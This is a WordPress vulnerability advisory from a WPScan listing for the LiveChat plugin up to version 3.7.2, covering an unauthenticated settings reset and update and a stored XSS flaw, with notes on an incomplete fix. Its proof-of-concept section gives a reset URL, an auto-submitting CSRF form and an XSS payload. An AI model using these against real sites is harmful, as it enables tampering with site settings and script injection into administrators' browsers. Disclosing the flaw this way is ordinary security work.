LiveChat <= 3.7.2 - Unauthenticated Option Update/Reset and Stored XSS



Description
The lack of proper CSRF and Authorisation checks could allow an unauthenticated attacker to update or reset the plugin's settings. Furthermore, when updating the livechat_email option, no sanitisation is performed, leading to a Stored XSS issue in the plugin's settings page.

CSRF and XSS fixed in 3.7.3, however the authorisation part added an is_admin() (which only check if the dashboard or admin panel is trying to be displayed) check. Author has been notified on July 2nd but hasn't responded or fixed the latter.
Proof of Concept
Unauthenticated Option Reset:
https://<BLOG>/wp-admin/admin-ajax.php?reset=1&page=livechat_settings

Unauthenticated Option Update (make sure the Referer of the request contains livechat_settings, for example "Referer: livechat_settings"):

<html>
  <body onload="document.forms[0].submit()">
    <form action="https://<BLOG>/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="licenseNumber" value="42"/>
      <input type="hidden" name="licenseEmail" value="whatever"/>
    </form>
  </body>
</html>

Unauthenticated Stored XSS:
Like the PoC above, but replace the licenseEmail value by "><svg/onload=alert(/XSS/)>

Affects Plugin

References

URL https://plugins.trac.wordpress.org/changeset?reponame=&new=2113080%40wp-live-chat-software-for-wordpress&old=2103185%40wp-live-chat-software-for-wordpress

Classification

Type MULTI

Miscellaneous

Views 924
Verified No
WPVDB ID 9441

Timeline

Publicly Published 2019-06-26 (28 days ago)
Added 2019-07-09 (14 days ago)
Last Updated 2019-07-09 (14 days ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin